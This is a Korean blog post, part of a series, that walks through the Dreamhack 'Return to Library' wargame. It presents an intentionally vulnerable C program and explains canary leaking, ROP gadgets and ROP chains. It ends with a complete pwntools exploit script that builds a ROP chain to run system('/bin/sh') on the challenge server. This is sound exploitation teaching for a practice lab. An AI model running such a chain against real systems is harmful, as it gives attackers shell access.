[ROP 시리즈 (3)] 드림핵(Dreamhack) - Return to Library 개념 및 실습

🔁ROP 시리즈🔁

[ROP 시리즈 (1)] 라이브러리와 링크

[ROP 시리즈 (2)] PLT, GOT

[ROP 시리즈 (3)] Return to Library 개념 및 실습 <-여기!

[ROP 시리즈 (4)] 드림핵(Dreamhack) - rop

 

---

 

ASLR와 NX의 등장으로 인해 함수나 버퍼의 주소를 알기 어려워졌고, 원하는 코드를 실행하는 것조차 어려워졌다.
오늘은 우리가 만든 셸 코드가 아닌 라이브러리의 함수를 실행하여 쉘을 따내는 실습을 해볼 것이다.
일단 ret가 pop rip의 약자임을 기억하고 들어가자

 
코드

// Name: rtl.c
// Compile: gcc -o rtl rtl.c -fno-PIE -no-pie

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

const char* binsh = "/bin/sh"; 
//"/bin/sh" 를 전역변수로 선언하여 데이터 세그먼트에 저장 (주소 고정)

int main() {
  char buf[0x30];
  
  setvbuf(stdin, 0, _IONBF, 0);
  setvbuf(stdout, 0, _IONBF, 0);
  
  // Add system function to plt's entry
  system("echo 'system@plt'"); 
  //system함수를 실행함으로써 plt에 추가하는 역할
  
  // Leak canary
  printf("[1] Leak Canary\n");
  printf("Buf: ");
  read(0, buf, 0x100); 
  printf("Buf: %s\n", buf);
  //카나리 획득
  
  // Overwrite return address
  printf("[2] Overwrite return address\n");
  printf("Buf: ");
  read(0, buf, 0x100);
  
  return 0;
}

 
우리의 최종 목표는 system("/bin/sh")을 실행하는 것이다.
그렇다면 return address에 system함수의 주소를 넣어야할까? 하지만 우리는 "/bin/sh"라는 문자열 또한 rdi에 넣어주어야한다.

 

따라서 그냥 바로 system함수의 주소를 넣으면 안되고 pop rdi; ret (pop rdi와 ret이 연속적으로 있는 코드)가 들어있는 곳을 찾아야한다.

 

카나리 우회는 간단하므로 그냥 간단히 보도록 하겠다. (이 포스트 주제와는 연관없으나 익스플로잇을 하기 위해 필요하다)

 

버퍼시작~카나리까지 거리 구해야함.

버퍼시작 위치는 read에서 rsi 위치를 참고하면 구할 수 있다!

카나리 위치는 보통 sfp-0x8이지만 gdb로 확인해보는 것이 더 정확하다(함수 에플로그에서 어떤애를 검증하는지 보고, 함수 프롤로그에서 그 애가 뭔지 확인하고 어디에 얼마나 저장되어있는지 확인하면 된다)

rsi가 buffer 위치다. 얘는 rbp-0x40이라고 한다

 

 카나리는 rbp-0x8에 잘 저장되어있당

 

(요기서 보면 rax를 fs:0x28에서 가져오는걸 알수이따)

 

 

우리는 스택 프레임(페이로드)을 위와같이 구성해줄 것이다. 이를 코드로 작성하면 payload=b'A'*0x38+canary+rbp_dummy+ret_gadget+poprdi_gadget+binsh_addr+sys_plt 이다.

이제 이렇게 스택 프레임이 있는 경우 main에서 ret에 도달했을 때 어떤식으로 흐름이 진행되는지 살펴보자. 카나리 우회는 다 했다고 가정하겠다.

 

일단 main에서 ret코드로 도착한 상황이다. 이때 ret는 pop rip의 약자이므로 우리는 스택 맨 위에 있는 pop rdi;ret의 주소(0x1234)를 rip로 옮긴다.

 

 

그러면 이렇게 실해 흐름이 main의 ret에서 0x1234 (pop rdi가 있는 부분)으로 옮겨졌다. 0x1234가 pop되었고 스택 맨 위에는 "bin/sh"주소가 남아있다.

한편 우리는 pop rdi라는 명령어를 실행해야 하므로 이를 실행하면 "/bin/sh"의 주소가 pop되어서 rdi에 저장된다.

 

이제 우리는 0x1234 밑의 ret을 실행해야한다(노란색으로 칠해진부분) 따라서 system@plt로 rip가 이동되고 스택에는 아무것도 남지 않게 된다. 한편 rdi에 /bin/sh가 들어있으므로 최종적으로 system("/bin/sh")

 

예전과 다른 점은, 단순히 예전에는 return문에 함수 주소 혹은 셸코드 주소'만' 넣었다면, 이제는 그 함수에 필요한 인자가 필요하다면, 그것도 처리해줄 코드조각을 먼저 넣는것이다. 그리고 리턴을 해주는 것이다. 즉 return하고 바로 함수가 실행되는 것이 아니라 함수가 실행되기 전 이전 동작들도 같이할 수 있게끔 ret를 이용하는 것이다.

예를 들어 우리가 system함수를 실행하려면 rdi에 인자를 먼저 넣어주는 과정이 필요하다.

따라서 우리가 필요한건 단순 ret이 아니라, pop rdi, ret인 것이다. 따라서 우리는 바로 system함수의 위치로 이동하는 것이 아니라 pop rdi를 하고 system함수로 리턴한다. 

이렇게 ret로 끝나는 코드 조각을 우리는 Return Gadget이라고 한다!! 또한 함수들도 대부분 ret로 끝나기 때문에 함수들도 return Gadget으로 쓰이기도 한다.

 

이렇게 리턴 가젯들로 연결된 코드 묶음을 ROP Chain이라고 한다, ROP Chain은 ret 단위로 여러 코드가 연쇄적으로 실행된다! ROP는 Return Oriented Programming의 약자로, Return Gadget을 이용해 복잡한 흐름을 만들어내는 해킹 기법이다. 오늘 하는 RTL(Return to Library)도 이것의 쉬운 예라고 생각하면 된다. ROP에 대한 자세한 내용은 다음에 포스트로 올릴 예정이다.

 

그리고 왜 그냥 gadget이 아니라 ret가 들어간 gadget을 찾냐면, ret을 해야 rip가 우리가 원하는 위치로 또 이동해 원하는 동작을 할 수 있기 때문이다!!

 

 

이제는 그냥 기계적으로 구해주면 된다

 

ROP Gadget 구하는 법

ROPgadget 명령어 이용

 

pop rdi; ret의 주소는 ROPgadget 명령어를 실행하여 찾는다.

명령어는 ROPgadget --binary [바이너리 이름] --re "찾을 가젯 규칙" 이다

0x400853이 우리가 원하는 가젯 주소이다

 

/bin/sh의 주소는 우리가 아까 전역 변수로 선언해 놓았었다.(참고로 ASLR는 데이터 세그먼트의 주소는 랜덤화하지 않는다) /bin/sh는 전역변수이므로 데이터 세그먼트에 있을 것이므로 위치는 고정이다.

 

 

마지막으로 system@plt 주소를 구하자! 이는 아래처럼 gdb에서 plt를 쳐서 구할 수도 있고,

 

익스플로잇 코드에 이를 가져오는 코드를 작성할 수도 있다.

e=ELF("./rtl")
sys_plt=e.plt[’system’] #system@plt주소

remote를 공격해도 remote의 바이너리 파일만 존재하면 걍 이렇게 해도 되는듯 싶다. 왜냐하면 ASLR이 걸려도 PIE만 안 걸려있다면 plt의 주소는 동일하기 때문에 remote에서 구하나 우리집 로컬 파일에서 구하나 plt 주소는 같다.

 

objdump

objdump 명령어를 이용해 수동으로 찾아줄 수도 있다!

ROPgadget 명령어를 이용하면 무조건 libc가 뭔지 알아야하지만, objdump이용하면 바이너리 전체에서 가젯 찾아줄 수 있기 때문에 활용도가 좀 더 높다.(예를 들어 코드 세그먼트 주소 안다고 가정하면 거기서 가젯 찾을 수 있음) 그대신 하나하나 찾아야한다.

 

나는 실제로 CTF 문제 낼 때 이 기능을 이용해서 가젯을 찾은 적 있다. 생각보다 활용도가 높으니 혹시 필요하면 사용해보자.

 

objdump -d Notepad | grep -B4 "ret"

 

[ROP] gadget찾는법

 

 

 

아무튼 이렇게 해서 최종 익스플로잇 코드를 작성하면 아래와 같다.

 

from pwn import *

p=remote("host3.dreamhack.games",11846)
buf=b'A'*0x39 #제발...........................
p.sendafter("Buf: ",buf)
p.recvuntil(buf)
canary=b'\x00'+p.recvn(7)

ret_gadget=p64(0x400285)
rbp_dummy=b'B'*0x8
poprdi_gadget=p64(0x400853)
binsh_addr=p64(0x400874)
sys_plt=p64(0x4005d0)

payload=b'A'*0x38+canary+rbp_dummy+ret_gadget+poprdi_gadget+binsh_addr+sys_plt
p.sendlineafter("Buf: ",payload)
p.interactive()

 

buf옆의 주석 제발은... 16진수 계산에서 0x40-0x8을 0x32로해서 삽질을 오지게했기 때문이다..^^ 그래서 다시 고쳐준 것이다..ㅜㅜ

 

 

다음 글

[ROP 시리즈 (4)] 드림핵(Dreamhack) - rop

[드림핵(Dreamhack)] rop